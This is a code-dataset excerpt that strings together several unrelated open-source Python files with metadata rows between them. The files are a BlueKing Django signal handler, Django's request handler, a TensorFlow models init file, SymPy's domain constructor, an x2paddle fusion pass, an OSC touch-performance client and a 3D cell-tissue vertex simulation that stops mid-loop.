You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.dispatch import receiver
from gcloud.iam_auth.tasks import register_grant_resource_creator_task
from gcloud.core.signals import user_enter
@receiver(user_enter)
def user_enter_handler(username, **kwargs):
register_grant_resource_creator_task.delay(username=username)
| gcloud/iam_auth/signals/handlers.py | 1,036 | Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
-*- coding: utf-8 -*- | 723 | en | 0.864501 |
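The receiver above runs whenever user_enter is dispatched; a minimal sketch of sending the signal (the sender value is an illustrative assumption):

from gcloud.core.signals import user_enter

user_enter.send(sender=None, username="admin")  # queues the async grant task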
from __future__ import unicode_literals
import sys
import types
from django import http
from django.core import signals
from django.utils.encoding import force_text
from django.utils.importlib import import_module
from django.utils.log import getLogger
from django.utils import six
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
if isinstance(callback, types.FunctionType): # FBV
view_name = callback.__name__
else: # CBV
view_name = callback.__class__.__name__ + '.__call__'
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(
sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
six.reraise(*exc_info)
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_text(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', '')
if not script_url:
script_url = environ.get('REDIRECT_URL', '')
if script_url:
return force_text(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_text(environ.get('SCRIPT_NAME', ''))
| django/core/handlers/base.py | 11,855 | Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
Returns an HttpResponse object for the given HttpRequest
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
Changes that are always applied to a response (in this order). We only assign to this when initialization is complete as it is used as a flag for initialization being complete. Setup default url resolver for this thread, this code is outside the try/except so we don't get a spurious "unbound local variable" exception in the event an exception is raised before resolver is set Apply request middleware Reset url resolver with a custom urlconf. Apply view middleware If the view raised an exception, run it through exception middleware, and if the exception middleware returns a response, use that. Otherwise, reraise the exception. Complain if the view returned None (a common error). FBV CBV If the response supports deferred rendering, apply template response middleware and the render the response Allow sys.exit() to actually exit. See tickets 1023 and 4701 Handle everything else, including SuspiciousOperation, etc. Get the exception info now, in case another exception is thrown later. Reset URLconf for this thread on the way out for complete isolation of request.urlconf Apply response middleware, regardless of the response Any exception should be gathered and handled If Http500 handler is not installed, re-raise last exception Return an HttpResponse that displays a friendly error message. If Apache's mod_rewrite had a whack at the URL, Apache set either SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any rewrites. Unfortunately not every Web server (lighttpd!) passes this information through all the time, so FORCE_SCRIPT_NAME, above, is still needed. | 2,569 | en | 0.872317 |
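load_middleware only requires that each entry in MIDDLEWARE_CLASSES name an importable class exposing some of the process_* hooks. A minimal sketch of a compatible old-style middleware; the class name and response header are illustrative:

import time

class TimingMiddleware(object):
    """Old-style middleware: instantiated once; hooks discovered by name."""

    def process_request(self, request):
        request._start_time = time.time()
        return None  # returning None continues on to the view

    def process_response(self, request, response):
        elapsed = time.time() - getattr(request, '_start_time', time.time())
        response['X-Elapsed-Seconds'] = '%.4f' % elapsed
        return response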
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Models package definition."""
from official.nlp.modeling.models.bert_classifier import BertClassifier
from official.nlp.modeling.models.bert_pretrainer import BertPretrainer
from official.nlp.modeling.models.bert_span_labeler import BertSpanLabeler
from official.nlp.modeling.models.bert_token_classifier import BertTokenClassifier
| official/nlp/modeling/models/__init__.py | 1,024 | Models package definition.
Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== | 689 | en | 0.830814 |
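A short sketch of how these exports are typically wired together; the encoder class and argument names follow official.nlp.modeling conventions of this era and should be read as assumptions:

from official.nlp.modeling import models, networks

encoder = networks.BertEncoder(vocab_size=30522, num_layers=2)  # sizes are illustrative
classifier = models.BertClassifier(network=encoder, num_classes=2)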
"""Tools for constructing domains for expressions. """
from sympy.polys.polyutils import parallel_dict_from_basic
from sympy.polys.polyoptions import build_options
from sympy.polys.domains import ZZ, QQ, RR, EX
from sympy.assumptions import ask, Q
from sympy.core import S, sympify
def _construct_simple(coeffs, opt):
"""Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains. """
result, rationals, reals, algebraics = {}, False, False, False
if opt.extension is True:
is_algebraic = lambda coeff: ask(Q.algebraic(coeff))
else:
is_algebraic = lambda coeff: False
# XXX: add support for a + b*I coefficients
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
if not algebraics:
reals = True
else:
# there are both reals and algebraics -> EX
return False
elif is_algebraic(coeff):
if not reals:
algebraics = True
else:
# there are both algebraics and reals -> EX
return False
else:
# this is a composite domain, e.g. ZZ[X], EX
return None
if algebraics:
domain, result = _construct_algebraic(coeffs, opt)
else:
if reals:
domain = RR
else:
if opt.field or rationals:
domain = QQ
else:
domain = ZZ
result = []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def _construct_algebraic(coeffs, opt):
"""We know that coefficients are algebraic so construct the extension. """
from sympy.polys.numberfields import primitive_element
result, exts = [], set([])
for coeff in coeffs:
if coeff.is_Rational:
coeff = (None, 0, QQ.from_sympy(coeff))
else:
a = coeff.as_coeff_add()[0]
coeff -= a
b = coeff.as_coeff_mul()[0]
coeff /= b
exts.add(coeff)
a = QQ.from_sympy(a)
b = QQ.from_sympy(b)
coeff = (coeff, b, a)
result.append(coeff)
exts = list(exts)
g, span, H = primitive_element(exts, ex=True, polys=True)
root = sum([ s*ext for s, ext in zip(span, exts) ])
domain, g = QQ.algebraic_field((g, root)), g.rep.rep
for i, (coeff, a, b) in enumerate(result):
if coeff is not None:
coeff = a*domain.dtype.from_list(H[exts.index(coeff)], g, QQ) + b
else:
coeff = domain.dtype.from_list([b], g, QQ)
result[i] = coeff
return domain, result
def _construct_composite(coeffs, opt):
"""Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X). """
numers, denoms = [], []
for coeff in coeffs:
numer, denom = coeff.as_numer_denom()
numers.append(numer)
denoms.append(denom)
polys, gens = parallel_dict_from_basic(numers + denoms) # XXX: sorting
if any(gen.is_number for gen in gens):
return None # generators are number-like so lets better use EX
n = len(gens)
k = len(polys)//2
numers = polys[:k]
denoms = polys[k:]
if opt.field:
fractions = True
else:
fractions, zeros = False, (0,)*n
for denom in denoms:
if len(denom) > 1 or zeros not in denom:
fractions = True
break
coeffs = set([])
if not fractions:
for numer, denom in zip(numers, denoms):
denom = denom[zeros]
            for monom, coeff in numer.items():
coeff /= denom
coeffs.add(coeff)
numer[monom] = coeff
else:
for numer, denom in zip(numers, denoms):
coeffs.update(numer.values())
coeffs.update(denom.values())
rationals, reals = False, False
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
reals = True
break
if reals:
ground = RR
elif rationals:
ground = QQ
else:
ground = ZZ
result = []
if not fractions:
domain = ground.poly_ring(*gens)
for numer in numers:
            for monom, coeff in numer.items():
numer[monom] = ground.from_sympy(coeff)
result.append(domain(numer))
else:
domain = ground.frac_field(*gens)
for numer, denom in zip(numers, denoms):
            for monom, coeff in numer.items():
numer[monom] = ground.from_sympy(coeff)
            for monom, coeff in denom.items():
denom[monom] = ground.from_sympy(coeff)
result.append(domain((numer, denom)))
return domain, result
def _construct_expression(coeffs, opt):
"""The last resort case, i.e. use the expression domain. """
domain, result = EX, []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def construct_domain(obj, **args):
"""Construct a minimal domain for the list of coefficients. """
opt = build_options(args)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
monoms, coeffs = zip(*obj.items())
else:
coeffs = obj
else:
coeffs = [obj]
    coeffs = list(map(sympify, coeffs))
result = _construct_simple(coeffs, opt)
if result is not None:
if result is not False:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
else:
if opt.composite:
result = _construct_composite(coeffs, opt)
else:
result = None
if result is not None:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
return domain, dict(zip(monoms, coeffs))
else:
return domain, coeffs
else:
return domain, coeffs[0]
| sympy/polys/constructor.py | 6,290 | We know that coefficients are algebraic so construct the extension.
Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X).
The last resort case, i.e. use the expression domain.
Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains.
Construct a minimal domain for the list of coefficients.
Tools for constructing domains for expressions.
XXX: add support for a + b*I coefficients there are both reals and algebraics -> EX there are both algebraics and reals -> EX this is a composite domain, e.g. ZZ[X], EX XXX: sorting generators are number-like so lets better use EX | 588 | en | 0.781877 |
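A short usage sketch of construct_domain; the coefficient lists are illustrative:

from sympy import Rational
from sympy.polys.constructor import construct_domain

dom, coeffs = construct_domain([1, 2, 3])            # all integers: dom is ZZ
dom, coeffs = construct_domain([1, Rational(1, 2)])  # one rational promotes dom to QQ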
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from x2paddle.optimizer.pass_ import Pass
from x2paddle.optimizer.fusion.dygraph import TraceFcFuser
from x2paddle.optimizer.pass_manager import pass_register
@pass_register
class TraceFcFusePass(Pass):
name = "trace_fc_fuse_pass"
def __init__(self):
Pass.__init__(self)
def apply(self, graph):
fuser = TraceFcFuser()
fuser.operate(graph, match_kind="topo")
# Used for registration.
trace_fc_fuse_pass = TraceFcFusePass()
| x2paddle/optimizer/fusion/dygraph/trace_fc_fuse_pass.py | 1,065 | Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Used for registration. | 587 | en | 0.860162 |
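The @pass_register decorator used above presumably records each pass class in a registry kept by pass_manager, keyed by its name attribute; a hypothetical minimal sketch (the real x2paddle implementation may differ):

PASS_REGISTRY = {}

def pass_register(cls):
    # record the pass under its declared name for later lookup by the manager
    PASS_REGISTRY[cls.name] = cls
    return cls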
""" Plays back tiny performances by sending OSC messages to Pure Data """
import struct
import socket
import random
from threading import Timer
DEFAULT_OSC_ADDRESS = "localhost"
DEFAULT_OSC_PORT = 5000
class TouchScreenOscClient(object):
"""A simple OSC client for sending messages recording touch screen performances."""
def __init__(self):
# just set up the socket.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setblocking(0)
def send_osc_message(self, osc_datagram, address, port):
"""Send OSC message via UDP."""
self.sock.sendto(osc_datagram, (address, port))
def pad_dgram_four_bytes(self, dgram):
"""Pad a datagram up to a multiple of 4 bytes."""
return (dgram + (b'\x00' * (4 - len(dgram) % 4)))
def setSynth(self, instrument="strings", address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to set the synth instrument."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/inst".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",s")
dgram += self.pad_dgram_four_bytes(instrument.encode('utf-8'))
self.send_osc_message(dgram, address, port)
def setSynthRandom(self):
"""Choose a random synth for performance playback"""
self.setSynth(random.choice(["chirp", "keys", "drums", "strings"]))
def sendTouch(self, x, y, z, address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to trigger a touch sound."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/touch".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",sfsfsf")
dgram += self.pad_dgram_four_bytes("/x".encode('utf-8'))
dgram += struct.pack('>f', x)
dgram += self.pad_dgram_four_bytes("/y".encode('utf-8'))
dgram += struct.pack('>f', y)
dgram += self.pad_dgram_four_bytes("/z".encode('utf-8'))
dgram += struct.pack('>f', z)
self.send_osc_message(dgram, address, port)
def playPerformance(self, perf_df):
"""Schedule performance of a tiny performance dataframe."""
        # Dataframe must have absolute time (in seconds) as index, and 'x', 'y', and 'z' as column names.
for row in perf_df.iterrows():
Timer(row[0], self.sendTouch, args=[row[1].x, row[1].y, row[1].z]).start() # used with time in column
| robojam/tiny_performance_player.py | 2,419 | A simple OSC client for sending touchscreen performance messages.
Pad a datagram up to a multiple of 4 bytes.
Schedule performance of a tiny performance dataframe.
Sends an OSC message to trigger a touch sound.
Send OSC message via UDP.
Sends an OSC message to set the synth instrument.
Choose a random synth for performance playback
Plays back tiny performances by sending OSC messages to Pure Data
just set up the socket. Dataframe must have absolute time (in seconds) as index, and 'x', 'y', and 'z' as column names. used with time in column | 558 | en | 0.792766 |
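A short usage sketch; it assumes a Pure Data patch listening on the default address and port:

client = TouchScreenOscClient()
client.setSynthRandom()          # pick one of the four instruments at random
client.sendTouch(0.5, 0.5, 0.1)  # normalized x, y and pressure z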
import networkx as nx
import numpy as np
import itertools
from scipy.spatial import distance
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import csv
import pdb
import globals as const
from funcs_orig import *
from math import isclose
from pyqt_viz import edge_viewer
import time
# Constants for simulation
dt = const.dt
#var_dt = True
# dimensions of the cell
l_apical = const.l_apical
l_depth = const.l_depth
# Set the arcs list
inner_arc = const.inner_arc
outer_arc = const.outer_arc
# mechanical parameters
# rest lengths of the passively elastic apical, basal and cell walls
l0_apical = l_apical
l0_basal = l_apical
l0_wall = l_depth
mu_apical = const.mu_apical
mu_basal = const.mu_basal
mu_wall = const.mu_wall
myo_beta = const.myo_beta
eta = const.eta
press_alpha = const.press_alpha
l_mvmt = const.l_mvmt
# initialize the tissue
G, K, centers, num_api_nodes, circum_sorted, belt, triangles = tissue_3d()
pit_centers = const.pit_centers
# Starting from t=0
t = 0
num_inter = 0
blacklist = []
contract = [True for counter in range(0,num_inter)]
#inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
# Starting from t=? after intercalations occur
#t = 1640
#num_inter = 20
#blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
#contract = [False for counter in range(0,num_inter)]
#G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')
#
#for counter in range(0,num_inter):
# node = blacklist[counter][0]
# neighbor = blacklist[counter][1]
# print(node, neighbor)
# cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor)))
# ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0])))
# temp1.remove(neighbor)
# temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1])))
# temp2.remove(node)
# circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
#
# t=initial nx Graph in pickled form for plotting later
print(t)
file_name = 't' + str(int(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
viewer = edge_viewer(G,attr='myosin')
t_plot=5
t_last=-t_plot
while t <= const.t_final:
if t == const.t_1:
for i in range(0,len(inner_arc)):
G[inner_arc[i-1]][inner_arc[i]]['myosin'] = const.belt_strength
print("Inner arc established")
# update myosin on outer arc
if t == const.t_2:
for i in range(0,len(outer_arc)):
G[outer_arc[i-1]][outer_arc[i]]['myosin'] = const.belt_strength
print("Outer arc established")
# update myosin on belt
if t == const.t_belt:
for i in range(0,len(belt)):
G[belt[i-1]][belt[i]]['myosin'] = const.belt_strength
print("Belt established")
if t-t_last>=t_plot:
viewer(G)
# increment t by dt
# initialize force_dict back to zeros
t = round(t+dt,1)
print(dt, t)
pos = nx.get_node_attributes(G,'pos')
force_dict = {new_list: np.zeros(3,dtype=float) for new_list in G.nodes()}
# pre-calculate magnitude of pressure
# index of list corresponds to index of centers list
PI = np.zeros(len(centers),dtype=float)
# eventually move to classes?
for n in range(0,len(centers)):
# get nodes for volume
pts = get_points(G,centers[n],pos)
# calculate volume
vol = convex_hull_volume_bis(pts)
# calculate pressure
PI[n] = -press_alpha*(vol-const.v_0)
# # Update myosin on a fictitious pit (no resemblance to SG geometry)
# if t < const.t_pit:
# myo = const.pit_strength*t
# for node in pit_centers:
# if node == 0:
# myo = 1.5*myo
# for neighbor in G.neighbors(node):
# G[node][neighbor]['myosin'] = myo
# if t > const.t_intercalate:
# if contract[0] == True:
# G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate)
# update myosin on inner arc
for node in G.nodes():
# update force on each node
force = [0.0,0.0,0.0]
# Elastic forces due to the cytoskeleton
for neighbor in G.neighbors(node):
a = pos[node]
b = pos[neighbor]
dist = distance.euclidean(a,b)
direction = unit_vector(a,b)
magnitude = elastic_force(dist, G[node][neighbor]['l_rest'], mu_apical)
force = np.sum([force,magnitude*np.array(direction)],axis=0)
# Force due to myosin
magnitude = myo_beta*G[node][neighbor]['myosin']
force = np.sum([force, magnitude*np.array(direction)],axis=0)
force_dict[node] = np.add(force_dict[node], force)
for center in centers:
index = centers.index(center)
pts = circum_sorted[index]
centroid = np.array([pos[center], pos[center+1000]])
centroid = np.average(centroid,axis=0)
# pressure for:
# apical nodes
for i in range(0,len(circum_sorted[index])):
area, extra = be_area([center,pts[i],pts[i-1]],[center,pts[i],pts[i-1]],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center] = np.add(force_dict[center],force)
force_dict[pts[i-1]] = np.add(force_dict[pts[i-1]],force)
force_dict[pts[i]] = np.add(force_dict[pts[i]],force)
# pressure for:
# basal nodes
area, extra = be_area([center+1000,pts[i-1]+1000,pts[i]+1000],[center+1000,pts[i-1]+1000,pts[i]+1000],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center+1000] = np.add(force_dict[center+1000],force)
force_dict[pts[i-1]+1000] = np.add(force_dict[pts[i-1]+1000],force)
force_dict[pts[i]+1000] = np.add(force_dict[pts[i]+1000],force)
# pressure for side panels
# loop through each cell
for index in range(0,len(circum_sorted)):
cell_nodes = circum_sorted[index]
centroid = np.array([pos[centers[index]], pos[centers[index]+1000]])
centroid = np.average(centroid, axis=0)
# loop through the 6 faces (or 5 or 7 after intercalation)
for i in range(0, len(cell_nodes)):
pts_id = np.array([cell_nodes[i-1], cell_nodes[i], cell_nodes[i]+1000, cell_nodes[i-1]+1000])
pts_pos = np.array([pos[pts_id[ii]] for ii in range(0,4)])
# on each face, calculate the center
center = np.average(pts_pos,axis=0)
# loop through the 4 triangles that make the face
for ii in range(0,4):
pos_side = [center, pts_pos[ii-1], pts_pos[ii]]
area = area_side(pos_side)
magnitude = PI[index]*area[0]*(1/2)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[pts_id[ii-1]] = np.add(force_dict[pts_id[ii-1]],force)
force_dict[pts_id[ii]] = np.add(force_dict[pts_id[ii]],force)
# Implement bending energy
# Loop through all alpha, beta pairs of triangles
for pair in triangles:
alpha, beta = pair[0], pair[1]
# Apical faces, calculate areas and cross-products
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# Basal faces
alpha = [alpha[0]+1000, alpha[1]+1000, alpha[2]+1000]
beta = [beta[0]+1000, beta[1]+1000, beta[2]+1000]
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# update location of node
pos = nx.get_node_attributes(G,'pos')
for node in force_dict:
G.node[node]['pos'] = d_pos(pos[node],force_dict[node],dt)
## Check for intercalation events
pos = nx.get_node_attributes(G,'pos')
for node in range(0,num_api_nodes):
if node not in belt:
for neighbor in G.neighbors(node):
